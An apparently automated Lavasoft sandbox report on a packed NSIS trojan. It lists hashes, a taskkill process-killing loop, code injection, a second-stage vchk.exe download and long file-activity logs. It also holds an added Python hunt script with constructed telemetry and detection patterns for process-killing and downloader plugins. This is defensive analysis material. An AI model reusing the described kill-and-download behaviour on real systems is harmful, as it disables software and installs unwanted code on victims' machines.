Trojan.Generic.14779156 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 870adaabb0d08155f2e2f0d0d5111c82
SHA1: 2bb70c58118b0f1e15c88f17985192c0b5d07dcc
SHA256: c0b0e10e0dd4b8a419192ddc8e866e34758a0d3f695c9bb1be76e21ba8103d6d
SSDeep: 24576:gRpVgU6qc00PhieAdO7gejjdYKmui3BmK:0VgUo00PQlMHdYvt
Size: 816065 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
WMIC.exe:568
vchk.exe:1656
taskkill.exe:216
taskkill.exe:1140
taskkill.exe:668
taskkill.exe:136
taskkill.exe:492
taskkill.exe:1832
taskkill.exe:1836
taskkill.exe:1772
taskkill.exe:1548
taskkill.exe:1372
taskkill.exe:936
taskkill.exe:2012
taskkill.exe:1096
taskkill.exe:628
taskkill.exe:1092
taskkill.exe:1492
taskkill.exe:1956
taskkill.exe:1952
taskkill.exe:828
taskkill.exe:1668
taskkill.exe:820
taskkill.exe:376
taskkill.exe:596
taskkill.exe:1124
taskkill.exe:316
taskkill.exe:1088
taskkill.exe:1928
taskkill.exe:1852
taskkill.exe:1856
taskkill.exe:1252
taskkill.exe:1016
taskkill.exe:916
taskkill.exe:1656
taskkill.exe:308
taskkill.exe:448
taskkill.exe:1232
taskkill.exe:440
taskkill.exe:1136
taskkill.exe:1932
taskkill.exe:908
taskkill.exe:1240
taskkill.exe:648
taskkill.exe:1632
taskkill.exe:516
taskkill.exe:1348
taskkill.exe:1340
taskkill.exe:336
taskkill.exe:576
taskkill.exe:856
taskkill.exe:1424
taskkill.exe:1980
taskkill.exe:1584
taskkill.exe:652
taskkill.exe:508
taskkill.exe:480
taskkill.exe:568
taskkill.exe:468
taskkill.exe:464
taskkill.exe:564
taskkill.exe:1804
taskkill.exe:168
taskkill.exe:228
taskkill.exe:1868
taskkill.exe:224
taskkill.exe:1916
taskkill.exe:968
taskkill.exe:1180
taskkill.exe:1456
taskkill.exe:1748
taskkill.exe:1740
taskkill.exe:740
taskkill.exe:1160
taskkill.exe:884
taskkill.exe:1204
taskkill.exe:608
taskkill.exe:552
taskkill.exe:1968
taskkill.exe:872
taskkill.exe:956
taskkill.exe:320
taskkill.exe:1112
taskkill.exe:324
taskkill.exe:1752
taskkill.exe:612
taskkill.exe:1888
taskkill.exe:1884
taskkill.exe:1760
taskkill.exe:1880
taskkill.exe:1284
taskkill.exe:512
taskkill.exe:1472
taskkill.exe:808
taskkill.exe:2008
taskkill.exe:1368
%original file name%.exe:1756
The Trojan injects its code into the following process(es):
winonit.exe:1360
getcap.exe:500
wincheckfe.exe:1768
wcheckf.exe:484
vchk.exe:1976
internetport3.exe:360
DYK287G2Jhwy64P0Ln0s.exe:1012
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process winonit.exe:1360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\a\avv.txt (2432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\vv[1].htm (2432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\uur[1].htm (2 bytes)
C:\a\ahho.txt (4 bytes)
C:\a\auur.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\hho[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
C:\a\vv.txt (0 bytes)
C:\a\uur.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh9.tmp (0 bytes)
C:\a\hho.txt (0 bytes)
The process getcap.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\a\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyD.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsyD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiC.tmp (0 bytes)
The process WMIC.exe:568 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
C:\a\ProcessList.txt (1888 bytes)
The Trojan deletes the following file(s):
C:\a\ProcessList.txt (0 bytes)
The process wincheckfe.exe:1768 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (0 bytes)
The process wcheckf.exe:484 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\vchk[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\inetc.dll (20 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp (0 bytes)
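Taken together, the process and file activity above is a recognisable shape rather than a set of isolated indicators: an NSIS installer stages the KillProcDLL.dll, FindProcDLL.dll and inetc.dll plugins under %Temp%\ns*.tmp\, runs WMIC.exe (which writes the process inventory to C:\a\ProcessList.txt; WMIC also drops TempWmicBatchFile.bat in its working directory, which suggests the installer ran from %Program Files%\FastInternet), then launches taskkill.exe roughly a hundred times, and a second stage downloads vchk.exe into Local Settings\Application Data\yuntnani. The following hunt script is an added example and is not part of the Lavasoft report; it scores process-creation and file-write telemetry for exactly that combination. The telemetry lines, the hypothetical parent PID 1200 and the thresholds (five taskkill.exe launches inside 60 seconds) are constructed for the example; the other PIDs are borrowed from the report only for readability.

```python
"""Hunt for the NSIS process-killer/downloader pattern in this report over
constructed process-creation and file-write telemetry (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample telemetry (not sandbox output). One event per line:
#   HH:MM:SS|proc|pid|ppid|image|command line
#   HH:MM:SS|file|pid|ppid|image|path written
# PID 1200 and the editor-setup.exe installer are hypothetical; the rest mirrors the report.
SAMPLE_EVENTS = r"""
10:00:00|proc|1756|1200|C:\a\setup.exe|"C:\a\setup.exe"
10:00:01|file|1756|1200|C:\a\setup.exe|C:\Users\bob\AppData\Local\Temp\nsA.tmp\System.dll
10:00:01|file|1756|1200|C:\a\setup.exe|C:\Users\bob\AppData\Local\Temp\nsA.tmp\KillProcDLL.dll
10:00:01|file|1756|1200|C:\a\setup.exe|C:\Users\bob\AppData\Local\Temp\nsA.tmp\inetc.dll
10:00:02|proc|568|1756|C:\WINDOWS\system32\wbem\wmic.exe|wmic process get name,processid
10:00:03|proc|216|1756|C:\WINDOWS\system32\taskkill.exe|taskkill /f /im app1.exe
10:00:03|proc|1140|1756|C:\WINDOWS\system32\taskkill.exe|taskkill /f /im app2.exe
10:00:04|proc|668|1756|C:\WINDOWS\system32\taskkill.exe|taskkill /f /im app3.exe
10:00:04|proc|136|1756|C:\WINDOWS\system32\taskkill.exe|taskkill /f /im app4.exe
10:00:05|proc|492|1756|C:\WINDOWS\system32\taskkill.exe|taskkill /f /im app5.exe
10:00:05|proc|1832|1756|C:\WINDOWS\system32\taskkill.exe|taskkill /f /im app6.exe
10:00:06|proc|484|1756|C:\a\wcheckf.exe|wcheckf.exe
10:00:07|file|484|1756|C:\a\wcheckf.exe|C:\Users\bob\AppData\Local\Temp\nsg8.tmp\inetc.dll
10:00:08|file|484|1756|C:\a\wcheckf.exe|C:\Users\bob\AppData\Local\yuntnani\vchk.exe
10:05:00|proc|3001|1200|C:\Users\bob\Downloads\editor-setup.exe|"editor-setup.exe"
10:05:01|file|3001|1200|C:\Users\bob\Downloads\editor-setup.exe|C:\Users\bob\AppData\Local\Temp\nsk3.tmp\System.dll
10:05:02|proc|3002|3001|C:\WINDOWS\system32\taskkill.exe|taskkill /im editor.exe
"""

# NSIS extracts plugins to %Temp%\ns<hex>.tmp\; these names are the process-hunting,
# process-killing and download plugins seen in the report (System.dll/nsExec.dll are common to benign installers too).
NSIS_PLUGIN = re.compile(
    r"\\Temp\\ns\w{1,4}\.tmp\\(System|inetc|nsExec|KillProcDLL|FindProcDLL)\.dll$", re.I)
# An .exe written one folder below the per-user local application data directory (XP and Vista+ layouts), excluding Temp.
LOCAL_APPDATA_EXE = re.compile(
    r"\\(AppData\\Local|Local Settings\\Application Data)\\(?!Temp\\)[^\\]+\\[^\\]+\.exe$", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse(text):
    """Turn the pipe-separated sample lines into event dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, kind, pid, ppid, image, detail = line.split("|", 5)
        events.append({"t": datetime.strptime(ts, "%H:%M:%S"), "kind": kind,
                       "pid": int(pid), "ppid": int(ppid), "image": image, "detail": detail})
    return events


def max_burst(times, window_s):
    """Largest number of timestamps that fall inside any window_s-second window."""
    times = sorted(times)
    best = j = 0
    for i in range(len(times)):
        while j < len(times) and (times[j] - times[i]).total_seconds() <= window_s:
            j += 1
        best = max(best, j - i)
    return best


def hunt(events, kill_threshold=5, window_s=60):
    """Return {pid: [reasons]} for every process showing the report's behaviour."""
    children = defaultdict(list)  # ppid -> process-creation events of its children
    writes = defaultdict(list)    # pid  -> file-write events
    for e in events:
        (children[e["ppid"]] if e["kind"] == "proc" else writes[e["pid"]]).append(e)

    findings = defaultdict(list)
    for pid in set(children) | set(writes):
        kids = children.get(pid, [])
        kills = [e["t"] for e in kids if basename(e["image"]) == "taskkill.exe"]
        burst = max_burst(kills, window_s)
        if burst >= kill_threshold:
            findings[pid].append(f"{burst} taskkill.exe children within {window_s}s")
        if any(basename(e["image"]) == "wmic.exe" for e in kids):
            findings[pid].append("spawned wmic.exe (process inventory before the kill loop)")
        plugins = set()
        for e in writes.get(pid, []):
            m = NSIS_PLUGIN.search(e["detail"])
            if m:
                plugins.add(m.group(1).lower())
        hostile = plugins & {"killprocdll", "findprocdll", "inetc"}
        if hostile:
            findings[pid].append("NSIS plugins staged: " + ", ".join(sorted(hostile)))
        dropped = [e["detail"] for e in writes.get(pid, []) if LOCAL_APPDATA_EXE.search(e["detail"])]
        if dropped and "inetc" in plugins:  # download plugin loaded and an .exe landed in local app data
            findings[pid].append("downloaded executable written to " + dropped[0])
    return dict(findings)


if __name__ == "__main__":
    for pid, reasons in sorted(hunt(parse(SAMPLE_EVENTS)).items()):
        print(pid, "->", "; ".join(reasons))
```

The benign installer (PID 3001) drops only System.dll and kills a single process, so it produces no finding; the taskkill burst, the WMIC child and the KillProcDLL/inetc staging each stand on their own, which keeps the rule useful even when the plugin directory was already cleaned up (the report shows the ns*.tmp folders being deleted after use).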
The process vchk.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns22.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns77.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns84.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns18.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns86.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns81.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns62.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns97.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns56.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns26.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns24.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA1.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns23.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns75.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns87.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns64.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns99.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns72.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns57.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns25.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns76.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns47.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns51.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns94.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAF.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns92.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAA.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns61.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns48.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns29.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA2.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns59.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns78.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA6.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns53.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAE.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns93.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns74.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2B.tmp (6 bytes)
C:\a\avchk.txt (2026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns54.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAC.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA5.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns50.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns63.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns79.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns73.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns21.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns46.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns37.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns89.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns30.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns90.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns95.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns67.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns36.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns60.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns58.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns33.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns68.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns98.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns39.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns28.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns82.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns52.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns69.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns80.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns49.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns55.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns20.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns41.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns15.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns66.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns44.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns10.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA9.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns12.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns65.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\vchk[1].htm (2026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns40.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns32.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns34.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns42.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns45.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns31.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns85.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns13.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns91.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns38.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns96.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns88.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns71.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns43.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns70.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns35.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA0.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAD.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3B.tmp (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns77.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns84.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns86.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns81.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns62.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns97.tmp (0 bytes)
